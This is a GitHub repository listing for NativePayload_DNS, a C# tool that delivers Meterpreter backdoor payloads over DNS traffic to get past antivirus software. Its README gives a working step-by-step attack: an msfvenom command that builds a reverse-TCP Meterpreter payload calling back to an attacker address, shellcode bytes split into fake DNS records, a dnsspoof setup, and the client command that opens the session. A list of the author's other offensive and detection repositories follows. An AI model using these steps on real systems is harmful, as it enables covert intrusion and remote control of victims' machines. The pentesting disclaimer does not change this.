DamonMohammadbagher/NativePayload_DNS DamonMohammadbagher/NativePayload_DNS

  • Stars
    star
    265
  • Rank 153,858 (Top 4 %)
  • Language
    C#
  • Created over 7 years ago
  • Updated over 1 year ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
DamonMohammadbagher/NativePayload_DNS
github

DamonMohammadbagher

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

C# code for Transferring Backdoor Payloads by DNS Traffic and Bypassing Anti-viruses

Stage

NativePayload_DNS

C# code for Backdoor Payloads transfer by DNS Traffic and Bypassing Anti-viruses

Published by Damon Mohammadbagher

Warning: this code Published to explaining Anti-Viruses Vulnerability for Pentesters and Security Researchers

for more information and step by step please Visit these links:

Bypassing Anti-viruses with transfer Backdoor Payloads by DNS traffic https://www.linkedin.com/pulse/bypassing-anti-viruses-transfer-backdoor-payloads-dns-mohammadbagher

Bypassing Anti-viruses with transfer Backdoor Payloads by DNS traffic https://www.peerlyst.com/posts/bypassing-anti-viruses-with-transfer-backdoor-payloads-by-dns-traffic-damon-mohammadbagher

Video Published by Damon Mohammadbagher (bbxc9x00x1f)

Bypassing Anti-Viruses with transfer Backdoor Payloads by DNS traffic

Video 1 : https://youtu.be/M4dbqRWRsUk

Bypassing AVs with NativePayload_DNS and Meterpreter_Payload_Detection

Video 2 : https://youtu.be/ngZl4PSfW6o

Video Description: Bypassing AVs with NativePayload_DNS.exe and Detecting Meterpreter Process by Meterpreter_Payload_Detection tool

step 1:

msfvenom C type payload in your kali linux

msfvenom –-platform windows –arch x86_64 –p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.50 –f c > /root/Desktop/payload.txt

copy payloads from payload.txt file to dns.txt like this format:

root@kali:~# cat /root/Desktop/dns.txt

1.1.1.0 "0xfc0x480x830xe40xf00xe80xcc0x000x000x000x410x510x410x500x52.1.com"

1.1.1.1 "0x510x560x480x310xd20x650x480x8b0x520x600x480x8b0x520x180x48.1.com"

1.1.1.2 "0x8b0x520x200x480x8b0x720x500x480x0f0xb70x4a0x4a0x4d0x310xc9.1.com"

1.1.1.3 "0x480x310xc00xac0x3c0x610x7c0x020x2c0x200x410xc10xc90x0d0x41.1.com"

step 2: Make Fake DNS server in your kali linux

root@kali:~# dnsspoof -i eth0 -f /root/Desktop/dns.txt

step 3:

run code in client

syntax: NativePayload_DNS.exe "1.1.1." 34 "192.168.1.50"

finally you can bypass AVs and you have Meterpreter Session

for more information and step by step please Visit these links:

Bypassing Anti-viruses with transfer Backdoor Payloads by DNS traffic https://www.linkedin.com/pulse/bypassing-anti-viruses-transfer-backdoor-payloads-dns-mohammadbagher

Bypassing Anti-viruses with transfer Backdoor Payloads by DNS traffic https://www.peerlyst.com/posts/bypassing-anti-viruses-with-transfer-backdoor-payloads-by-dns-traffic-damon-mohammadbagher

Related Tool:

C# code for Backdoor Payloads transfer by IPv6 Address (AAAA) records and DNS Traffic also Bypassing Anti-viruses https://github.com/DamonMohammadbagher/NativePayload_IP6DNS

Related link:

Bypass all anti-viruses by Encrypted Payloads with C#

https://www.linkedin.com/pulse/bypass-all-anti-viruses-encrypted-payloads-c-damon-mohammadbagher?trk=pulse_spock-articles

More Repositories

1

eBook-BypassingAVsByCSharp

eBook "Bypassing AVS by C#.NET Programming" (Free Chapters only)
458
star
2

ETWProcessMon2

ETWProcessMon2 is for Monitoring Process/Thread/Memory/Imageloads/TCPIP via ETW + Detection for Remote-Thread-Injection & Payload Detection by VirtualMemAlloc Events (in-memory) etc.
C#
291
star
3

NativePayloads

All my Source Codes (Repos) for Red-Teaming & Pentesting + Blue Teaming
C#
222
star
4

NativePayload_Reverse_tcp

Meterpreter Encrypted Payload by C#
C#
160
star
5

Meterpreter_Payload_Detection

Meterpreter_Payload_Detection.exe tool for detecting Meterpreter in memory like IPS-IDS and Forensics tool
C#
159
star
6

NativePayload_CBT

NativePayload_CallBackTechniques C# Codes (Code Execution via Callback Functions Technique, without CreateThread Native API)
C#
114
star
7

NativePayload_ReverseShell

This is Simple C# Source code to Bypass almost "all" AVS, (kaspersky v19, Eset v12 v13 ,Trend-Micro v16, Comodo & Windows Defender Bypassed via this method Very Simple)
C#
109
star
8

Some_Pentesters_SecurityResearchers_RedTeamers

Some Pentesters, Security Researchers, Red Teamers which i learned from them a lot...
103
star
9

NativePayload_Image

Transferring Backdoor Payloads with BMP Image Pixels
Shell
79
star
10

NativePayload_PE1

NativePayload_PE1/PE2 , Injecting Meterpreter Payload bytes into local Process via Delegation Technique + in-memory with delay Changing RWX to X or RX or (both) [Bypassing AVs]
C#
57
star
11

NativePayload_BSSID

Transferring Backdoor Payload by BSSID and Wireless traffic
Shell
55
star
12

NativePayload_DNS2

C# code for Transferring Backdoor Payloads by DNS Traffic (A - PTR Records) and Bypassing Anti-viruses
C#
45
star
13

NativePayload_ARP

C# code for Transferring Backdoor Payloads by ARP Traffic and Bypassing Anti-viruses (Slow)
C#
43
star
14

Videos-BypassingAVsByCSharp

Video files for eBook: "Bypassing AVs by C#.NET Programming"
41
star
15

ETWNetMonv3

ETWNetMonv3 is simple C# code for Monitoring TCP Network Connection via ETW & ETWProcessMon/2 is for Monitoring Process/Thread/Memory/Imageloads/TCPIP via ETW + Detection for Remote-Thread-Injection & Payload Detection by VirtualMemAlloc Events (in-memory) etc.
C#
38
star
16

NativePayload_IP6DNS

C# code for Transferring Backdoor Payloads by IPv6 Address (AAAA) records and DNS Traffic also Bypassing Anti-viruses
C#
31
star
17

NativePayload_ICMP

C# code for Transferring Backdoor Payloads by ICMPv4 Traffic and bypassing Anti-Viruses
C#
29
star
18

FakeFileMaker

Social Engineering: Simple way to make a fake file for Backdoors
C#
24
star
19

BEV4

BasicEventViewer4 (BEV v4.0), this code will useful for All Blue/Purple Teams , RealTime Monitoring Sysmon Events , Mitre Attack Detections via yaml files
C#
16
star
20

NativePayload_HTTP

Data Exfiltration via HTTP Traffic (C# and Shell Script)
Shell
16
star
21

NativePayload_ARP2

Simple Script "NativePayload_ARP2.sh" for Sending DATA via ARP Bcast Traffic to all systems in (LAN) by "Vid" tag
Shell
13
star
22

NativePayload_Tinjection

Remote Thread Injection by C# + Delegate Techniques
C#
12
star
23

NativePayload_TiACBT

NativePayload_TiACBT (Remote Thread Injection + C# Async Method + CallBack Functions Technique)
C#
12
star
24

NativePayload_DIM

NativePayload_DIM Dynamic native dll Injection in Memory , Injecting Native DLL bytes to local Process
C#
11
star
25

NativePayload_DCP

Compiling Csharp in-memory and Execute to bypass AVs
C#
11
star
26

Exfiltration-and-Uploading-DATA-by-DNS-Traffic-AAAA-Records-

Pdf File : Exfiltration and Uploading DATA by DNS Traffic (AAAA Records)
10
star
27

RedbudTree

DNS IPv6 Request Listener (UDP Port 53) for Detecting Exfiltration DATA via IPv6 DNS AAAA Record Requests
C#
9
star
28

eBook_Bypassing-Antiviruses-by-C-Programming-v2.0

bypassing Anti-viruses by csharp programming v2.0
9
star
29

NativePayload_LocalCreateThread7

Chunking CobaltStrike Payloads + Jump Method
C#
9
star
30

FSWatch

File System Watcher via C# (Monitoring File Activity , Create/Delete/Change/Rename events + some Activity like Size/Attribute/Security Changes & LastAccess, LastWrite etc...)
C#
8
star
31

damonmohammadbagher.github.io

HTML
8
star
32

NativePayload_CTX

NativePayload_CTX Create Thread via _beginthreadex function in msvcrt.dll
C#
8
star
33

TCPMon

TCPMon v3.1 or (4.0) was a very old Code which made by me in C# for Monitoring TCP Connection via Native APIs (was fun in that time ;D)
C#
7
star
34

Payload-hiding-Method-via-Infecting-Target-Process-Memory

HTML
7
star
35

NativePayload_TId

Remote Thread Injection by C# Delegate
C#
7
star
36

NativePayload_CDynApp3

Loading Csharp C2 Client-side codes in RAM by Very Simple New Technique to avoid Detection
C#
7
star
37

NativePayload_RefPtr1

NativePayload_RefPtr1 Indirect call csharp method in memory [without call c# method in source code directly]
C#
5
star
38

NativePayload_ASM3

NativePayload_ASM/AsynASM , Injecting Meterpreter Payload bytes into local Process via Delegation Technique [Technique D] + in-memory with delay Changing RWX to X [Bypassing AVs]
C#
5
star
39

NativePayload_MP

C# Backdoor & Mapper/Proxy tool (backdoor & proxy tool working in memory only)
C#
4
star
40

Manifest-Creator

C# tool for make XML report from Network Hosts (report contains: Cpu,Bios,Motherboard,Vga,Sound,Hdd,Ram,Display-Monitor,IpAddress,Os,Users,...)
C#
4
star
41

NativePayload_DynLCI

NativePayload_DynLCI , Dynamic Local Code Invoke , Injecting Meterpreter Payload bytes into local Process
C#
4
star
42

NativePayload_JMP4

in C# you can use Emit(Opcodes.jmp,TargetMethod) in your codes without writing any asm bytes in code to jump to pointer of TargetMethod or (MethodInfo) to run in-memory via Emit(Opcodes.jmp, method) in system.reflection namespace
C#
4
star
43

BEV3

BasicEventViewer (BEV v3.0), this code will useful for All Blue Teamers.
C#
2
star
44

DamonMohammadbagher

2
star
45

NativePayload_DYN

Compiling Csharp in-memory and Execute to bypass AVs
C#
2
star